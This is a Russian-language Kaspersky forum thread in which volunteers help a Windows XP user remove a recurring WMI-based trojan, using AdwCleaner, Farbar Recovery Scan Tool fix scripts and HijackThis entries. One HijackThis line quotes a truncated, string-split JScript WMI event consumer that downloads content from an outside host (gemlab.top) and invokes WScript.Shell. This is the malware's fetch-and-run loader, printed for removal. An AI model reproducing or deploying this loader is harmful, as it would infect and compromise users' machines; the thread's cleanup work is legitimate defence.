Перейти к содержанию
Правила раздела

trojan.multi.wmirun.a в system memory

Arv1nd

От Arv1nd
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Arv1nd Новичок

Arv1nd

Опубликовано
Опубликовано (изменено)

Привет всем. Постоянно появляется уведомление о том что нужно лечение с перезагрузкой. Угроза trojan.multi.wmirun.a находится в system memory. После перезагрузки какое-то время все нормально, потом опять тоже самое. Помогите пожалуйста!
Система ХР

Kaspersky endpoint security 10

CollectionLog-2018.10.23-15.50.zip

Изменено пользователем Arv1nd
Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Здравствуйте!

 

Дополнительно:

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

Только саму утилиту скачайте отсюда.

Ссылка на комментарий
Поделиться на другие сайты
Arv1nd Новичок

Arv1nd

Опубликовано
  • Автор
Опубликовано

Здравствуйте!

 

Дополнительно:

  • Скачайте AdwCleaner (by Malwarebytes) и сохраните его на Рабочем столе.
  • Запустите его (необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\Logs\AdwCleaner[sxx].txt (где x - любая цифра).
  • Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

Только саму утилиту скачайте отсюда.

 

AdwCleanerS0.txt

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Повторите сканирование и очистите все найденное. После перезагрузки лог с символом [C0] прикрепите.

 

(Для ответа используйте поле внизу, не нужно цитировать весь предыдущий пост).

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.

Когда программа запустится, нажмите Yes для соглашения с предупреждением.

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты
Sandor Мудрец

Sandor

Опубликовано
Опубликовано

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:

    Start::
CreateRestorePoint:
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
GroupPolicyScripts: Restriction <==== ATTENTION
CHR HKU\S-1-5-21-1659004503-1844823847-682003330-1004\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
Toolbar: HKU\S-1-5-21-1659004503-1844823847-682003330-1004 -> No Name - {09900DE8-1DCA-443F-9243-26FF581438AF} -  No File
FF user.js: detected! => C:\Documents and Settings\Главбух\Application Data\Mozilla\Firefox\Profiles\2fhejecr.default\user.js [2015-11-11]
FF Extension: (Домашняя страница Mail.Ru) - C:\Documents and Settings\Главбух\Application Data\Mozilla\Firefox\Profiles\2fhejecr.default\Extensions\homepage@mail.ru [2017-02-27] [Legacy]
FF Extension: (Пульт) - C:\Documents and Settings\Главбух\Application Data\Mozilla\Firefox\Profiles\2fhejecr.default\Extensions\ntp-amigo@corp.mail.ru.xpi [2018-03-29] [Legacy]
FF Extension: (Поиск@Mail.Ru) - C:\Documents and Settings\Главбух\Application Data\Mozilla\Firefox\Profiles\2fhejecr.default\Extensions\search@mail.ru [2017-02-27] [Legacy]
FF Extension: (Советник Яндекс.Маркета) - C:\Documents and Settings\Главбух\Application Data\Mozilla\Firefox\Profiles\2fhejecr.default\Extensions\sovetnik@metabar.ru.xpi [2018-07-23]
FF Extension: (Пульт) - C:\Program Files\Mozilla Firefox\distribution\extensions\ntp-amigo@corp.mail.ru.xpi [2017-02-01] [Legacy]
EmptyTemp:
Reboot:
End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

 

Подробнее читайте в этом руководстве.

 

Проверьте все расширения Мозиллы и Хрома, все ли установлены вами и удалите лишние.

 

Сообщите что с проблемой.

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано (изменено)

+

1) "Пофиксите" в HijackThis:

O4 - HKLM\..\Session Manager: [BootExecute] = C:\Program Files\Paragon Software\Drive Copy 11 Professional\bluescrn\bluescrn.exe (file missing)
O4 - MSConfig\startupreg: Acronis Scheduler2 Service [command] = C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe (HKLM) (2017/07/04) (file missing)
O4 - MSConfig\startupreg: AcronisTimounterMonitor [command] = C:\Program Files\Acronis\TrueImageHome\TimounterMonitor.exe (HKLM) (2017/07/04) (file missing)
O4 - MSConfig\startupreg: Browser Manager [command] = C:\Documents and Settings\Главбух\Local Settings\Application Data\Yandex\BrowserManager\MBLauncher.exe (HKCU) (2017/07/04) (file missing)
O4 - MSConfig\startupreg: KernelFaultCheck [command] = C:\WINDOWS\system32\dumprep 0 -k (HKLM) (2017/07/04) (file missing)
O4 - MSConfig\startupreg: TrueImageMonitor.exe [command] = C:\Program Files\Acronis\TrueImageHome\TrueImageMonitor.exe (HKLM) (2017/07/04) (file missing)
O22 - Task (.job): GoogleUpdateTaskUserS-1-5-21-392549096-617494214-1462613952-1121Core.job - C:\Documents and Settings\glavbuh\Local Settings\Application Data\Google\Update\GoogleUpdate.exe (file missing) /c
O22 - Task (.job): GoogleUpdateTaskUserS-1-5-21-392549096-617494214-1462613952-1121UA.job - C:\Documents and Settings\glavbuh\Local Settings\Application Data\Google\Update\GoogleUpdate.exe (file missing) /ua /installsource scheduler
O25 - WMI Event: __gconsumer1 - __gfilter1 - var e,r,n,s,c,l,o=3000,p="htt"+"p:/"+"/w.gem"+"lab.top/x86/k.txt";for(s=new ActiveXObject("Micro"+"soft.XM"+"LHTTP"),x=new ActiveXObject("Scri"+"pting.Fil"+"esystemObject"),l=new ActiveXObject("WSc"+"ript.S"+"hell"),s.open("GET",p,!1),s.send(),q=s.responseText,r=q.split("\r\n"),i=0;i<r.length;i++)if(883 bytes)
 

2) - Перетащите лог Check_Browsers_LNK.log из папки AutoLogger\CheckBrowsersLNK на утилиту ClearLNK. Отчёт о работе прикрепите.

 

3) Сделайте свежие логи Автологером.

 

4) Проверьте, что с проблемой.

Изменено пользователем regist
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

@Arv1nd, инструкции надо выполнять в том порядке в котором они написаны. Переделайте логи Автологера.

+ ждём

 

 


После сегодняшних действий буду наблюдать.
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • sakuuna
      System Fan 90b на ноутбуке
      От sakuuna
      Короче раньше такой ошибки не выходило, но он нагревался и бывало даже перегревался. Сейчас же выдает эту ошибку при запуске и соотвесвтенно быстро наргревается, но зависит от того, как его нагрузить. Ноутбук старенький:

      HP - модель e011sr
      Процессор    AMD A8-4500M APU with Radeon(tm) HD Graphics      1.90 GHz
      Оперативная память    6,00 ГБ (доступно: 5,19 ГБ)
      Тип системы    64-разрядная операционная система, процессор x64
      Видеоадаптеры: AMD Radeon HD 7640G и HD 8670M

       Скачал lObit ACS PRO MonitorPort: Там тип показывает, скорость вентилятор 2700RPM, но бывало и 1700RPM при такой же нагржуенности ноутбука, CPU, GPU, и материнка, соответвенно когда играл в слабую игру такую, как гта са у меня значения в градусах поднимались до 80 и больше градусов, При 1900RPM(оборотов в минуту, если я не ошибаюсь). Соответсвенно хочу узнать в чем проблема. И если надо что-то проверить, говорите
       
    • parnishka
      Вирусы тормозят компьютер, а при сканировании компьютер перезагружает с ошибкой memory management и возвращает назад в то же время
      От parnishka
      Описал выше, прошу помощи и всем добра!
    • An9ReY
      NT AUTHORITY\SYSTEM запускает мониторинг активности
      От An9ReY
      Недавно заметил что нт запускает мониторинг активности, и когда Касперский находит необработанные файлы в ходе проверки и просит что с ними делать этот нт их пропускает , как от него избавиться , на пк стоит винда 7 , смотрел через вирус тул Касперского он ничего не показал 
    • KL FC Bot
      Как исключить свой роутер из слежки через Wi-Fi Positioning System | Блог Касперского
      От KL FC Bot
      Каждый раз, когда мимо вашей точки доступа Wi-Fi проходит или проезжает человек со смартфоном и включенным GPS, примерные географические координаты роутера попадают в базы данных Apple, Google и других техногигантов. Это неотъемлемая часть системы позиционирования по Wi-Fi (WPS, Wi-fi Positioning System). И для того чтобы ваш роутер попал в эту базу данных, вам даже необязательно иметь смартфон — достаточно того, чтобы смартфоны были у ваших соседей или просто проходящих мимо.
      Благодаря WPS вы видите на экране своего смартфона точку, соответствующую вашему местоположению, спустя мгновение после запуска карты, вместо несколько минут, нужных при получении «чистокровных» GPS-данных со спутников. Смартфон проверяет, какие точки доступа Wi-Fi есть поблизости, отправляет список в Google/Apple и в ответ получает либо свои вычисленные координаты (от Google), либо список координат роутеров (от Apple), чтобы вычислить положение самостоятельно.
      Геопозиционированием этого типа могут с успехом пользоваться устройства вообще без GPS, например ноутбуки. Как выяснили исследователи MIT, Apple позволяет запрашивать координаты точек доступа без особых ограничений, поэтому можно составить свою собственную карту всех роутеров мира, а затем находить на ней интересные явления, закономерности, а иногда и следить за нужными людьми.
      В чем риски слежки за роутерами
      Хотя примерное физическое местоположение роутера не кажется особо секретной информацией, особенно для тех, кто и так живет в вашем и соседних домах, есть целый ряд случаев, когда эту информацию желательно скрыть. Вот лишь некоторые примеры:
      терминалы спутникового Интернета, например Starlink. Они раздают Интернет по Wi-Fi, и слежка за терминалом равна слежке за положением пользователя. Это особенно чувствительно, когда терминалы применяются в зонах военных конфликтов и чрезвычайных ситуаций; пользователи мобильных хотспотов для бизнеса и путешествий. Если вы считаете удобным раздавать Интернет с мобильного роутера на ноутбук и другие свои устройства, весьма вероятно, что карманный хотспот сопровождает вас во все деловые поездки. А заодно создает возможности следить за их графиком, частотой и направлениями. То же касается хотспотов, устанавливаемых в «домах на колесах» и на яхтах; люди, совершившие переезд. Нередко роутер переезжает вместе с владельцем, и тогда его новый адрес могут узнать те, кто хотя бы раз бывал по старому адресу и подключался к Wi-Fi. Хотя обычно эта ситуация невинна и не несет негативных последствий, все может быть иначе для тех, кто переехал, спасаясь от травли, домашнего насилия или других серьезных проблем.  
      Посмотреть статью полностью
    • distress
      Ошибка лечения system idle process net malware url
      От distress
      Добрый день, получилось так что словил серьезный майнер с автозапуском порно-сайта через редирект.
      Все что похожее есть по другим темам прочитал, понял что все очень индивидуально, у каждого свои логи и вариант решения. Переустановить систему нет возможности, стоят важные программы, файлы.
      Скачал AV block remover и сделал collectionlog, файлы прикрепляю.
      Помогите пожалуйста.CollectionLog-2024.05.15-22.04.zipAV_block_remove_2024.05.15-18.34.log
×
×
  • Создать...